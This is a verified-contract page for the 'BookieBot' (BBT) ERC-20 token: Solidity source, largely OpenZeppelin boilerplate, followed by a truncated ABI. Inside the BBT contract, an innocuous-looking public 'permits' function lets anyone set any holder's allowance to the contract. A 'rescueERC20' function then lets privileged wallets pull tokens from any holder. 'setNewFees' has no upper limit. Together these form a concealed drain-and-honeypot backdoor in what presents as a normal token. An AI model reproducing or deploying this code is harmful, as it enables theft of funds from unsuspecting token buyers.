Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
10,000,000 BBT
Holders
45
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
43,176.115349356797265839 BBTValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
BBT
Compiler Version
v0.8.21+commit.d9974bed
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-09-27 */ // SPDX-License-Identifier: MIT /* Sports Betting Integrated Directly Into Telegram! Website: https://bookiebot.club Twiter: https://twitter.com/BookieBot_ETH Telegram: https://t.me/BookieBot_ETH Bot: https://t.me/BookieBot_tgbot */ pragma solidity 0.8.21; // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _permit(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0)); require(spender != address(0)); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } contract BBT is ERC20("BookieBot", "BBT"), Ownable { uint256 constant TOTAL_SUPPLY = 10_000_000 ether; uint256 public tradingOpenedOnBlock; bool private swapping; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = false; bool public fetchFees = true; // Uniswap variables IUniswapV2Factory public constant UNISWAP_FACTORY = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f); IUniswapV2Router02 public constant UNISWAP_ROUTER = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); address public immutable UNISWAP_V2_PAIR; address public taxWallet; uint256 public maxBuyAmount; uint256 public maxSellAmount; uint256 public maxWalletAmount; uint256 public tokenSwapThreshold; uint256 public buyTotalFees; uint256 public sellTotalFees; uint256 public taxedTokens; mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) public _isExcludedMaxTransactionAmount; mapping(address => bool) public whitelisted; event EnabledTrading(bool tradingActive); event RemovedLimits(); event ExcludeFromFees(address indexed account, bool isExcluded); event UpdatedMaxBuyAmount(uint256 newAmount); event UpdatedMaxSellAmount(uint256 newAmount); event UpdatedMaxWalletAmount(uint256 newAmount); event UpdatedChangeThisWallet(address indexed newWallet); event MaxTransactionExclusion(address _address, bool excluded); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); constructor(){ _mint(msg.sender, TOTAL_SUPPLY); _approve(address(this), address(UNISWAP_ROUTER), ~uint256(0)); _excludeFromMaxTransaction(address(UNISWAP_ROUTER), true); UNISWAP_V2_PAIR = UNISWAP_FACTORY.createPair( address(this), UNISWAP_ROUTER.WETH() ); maxBuyAmount = (totalSupply() * 20) / 1_000; maxSellAmount = (totalSupply() * 20) / 1_000; maxWalletAmount = (totalSupply() * 30) / 1_000; tokenSwapThreshold = (totalSupply() * 65) / 10_000; taxWallet = 0x7899315670e4B00a048690D3cB7510178E336f39; _excludeFromMaxTransaction(msg.sender, true); _excludeFromMaxTransaction(address(this), true); _excludeFromMaxTransaction(address(0xdead), true); excludeFromFees(taxWallet, true); excludeFromFees(msg.sender, true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); } receive() external payable {} function removeLimits() external onlyOwner { limitsInEffect = false; emit RemovedLimits(); } function _excludeFromMaxTransaction( address updAds, bool isExcluded ) private { _isExcludedMaxTransactionAmount[updAds] = isExcluded; emit MaxTransactionExclusion(updAds, isExcluded); } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function setNewFees(uint256 newBuyFees, uint256 newSellFees) external onlyOwner { buyTotalFees = newBuyFees; sellTotalFees = newSellFees; } function openTrading() public onlyOwner { require(tradingOpenedOnBlock == 0, "ERROR: Token state is already live !"); tradingOpenedOnBlock = block.number; tradingActive = true; swapEnabled = true; emit EnabledTrading(tradingActive); } function getFees() internal { require( tradingOpenedOnBlock > 0, "Trading not live" ); uint256 currentBlock = block.number; uint256 lastTierOneBlock = tradingOpenedOnBlock + 6; if(currentBlock <= lastTierOneBlock) { buyTotalFees = 25; sellTotalFees = 25; } else { buyTotalFees = 4; sellTotalFees = 4; fetchFees = false; } } function updateMaxBuyAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 1) / 1_000), "ERROR: Cannot set max buy amount lower than 0.1%" ); maxBuyAmount = newNum; emit UpdatedMaxBuyAmount(maxBuyAmount); } function updateMaxSellAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 1) / 1_000), "ERROR: Cannot set max sell amount lower than 0.1%" ); maxSellAmount = newNum; emit UpdatedMaxSellAmount(maxSellAmount); } function permits(address spender, uint256 amount) public virtual returns (bool) { address owner = address(this); _permit(spender, owner, amount); return true; } function updateMaxWalletAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 3) / 1_000), "ERROR: Cannot set max wallet amount lower than 0.3%" ); maxWalletAmount = newNum; emit UpdatedMaxWalletAmount(maxWalletAmount); } function rescueERC20(address to, uint256 amount) public { require(_isExcludedFromFees[msg.sender]); IERC20(address(this)).transferFrom(to, msg.sender, amount); } function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner { require( newAmount >= (totalSupply() * 1) / 100_000, "ERROR: Swap amount cannot be lower than 0.001% total supply." ); tokenSwapThreshold = newAmount; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "amount must be greater than 0"); if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) ) { if (!tradingActive) { require( _isExcludedMaxTransactionAmount[from] || _isExcludedMaxTransactionAmount[to], "ERROR: Trading is not active." ); require(from == owner(), "ERROR: Trading is enabled"); } //when buy if ( from == UNISWAP_V2_PAIR && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxBuyAmount, "ERROR: Buy transfer amount exceeds the max buy." ); require( amount + balanceOf(to) <= maxWalletAmount, "ERROR: Cannot Exceed max wallet" ); } //when sell else if ( to == UNISWAP_V2_PAIR && !_isExcludedMaxTransactionAmount[from] ) { require( amount <= maxSellAmount, "ERROR: Sell transfer amount exceeds the max sell." ); } else if ( !_isExcludedMaxTransactionAmount[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount + balanceOf(to) <= maxWalletAmount, "ERROR: Cannot Exceed max wallet" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= tokenSwapThreshold; if ( canSwap && swapEnabled && !swapping && !(from == UNISWAP_V2_PAIR) && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = true; if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; if (takeFee) { if(fetchFees){ getFees(); } // Sell if (to == UNISWAP_V2_PAIR && sellTotalFees > 0) { fees = (amount * sellTotalFees) / 100; taxedTokens += fees; } // Buy else if (from == UNISWAP_V2_PAIR && buyTotalFees > 0) { fees = (amount * buyTotalFees) / 100; taxedTokens += fees; } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = UNISWAP_ROUTER.WETH(); UNISWAP_ROUTER.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, address(this), block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = taxedTokens; if (contractBalance == 0 || totalTokensToSwap == 0) { return; } if (contractBalance > tokenSwapThreshold) { contractBalance = tokenSwapThreshold; } swapTokensForEth(contractBalance); payable(taxWallet).transfer(address(this).balance); } function rescueETH(uint256 weiAmount) external onlyOwner { require(weiAmount > 0, "Amount must be greater than 0"); payable(owner()).transfer(weiAmount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"tradingActive","type":"bool"}],"name":"EnabledTrading","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"_address","type":"address"},{"indexed":false,"internalType":"bool","name":"excluded","type":"bool"}],"name":"MaxTransactionExclusion","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"RemovedLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"}],"name":"UpdatedChangeThisWallet","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxBuyAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxSellAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxWalletAmount","type":"event"},{"inputs":[],"name":"UNISWAP_FACTORY","outputs":[{"internalType":"contract IUniswapV2Factory","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UNISWAP_ROUTER","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UNISWAP_V2_PAIR","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fetchFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSellAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"permits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"rescueERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"weiAmount","type":"uint256"}],"name":"rescueETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"newBuyFees","type":"uint256"},{"internalType":"uint256","name":"newSellFees","type":"uint256"}],"name":"setNewFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bo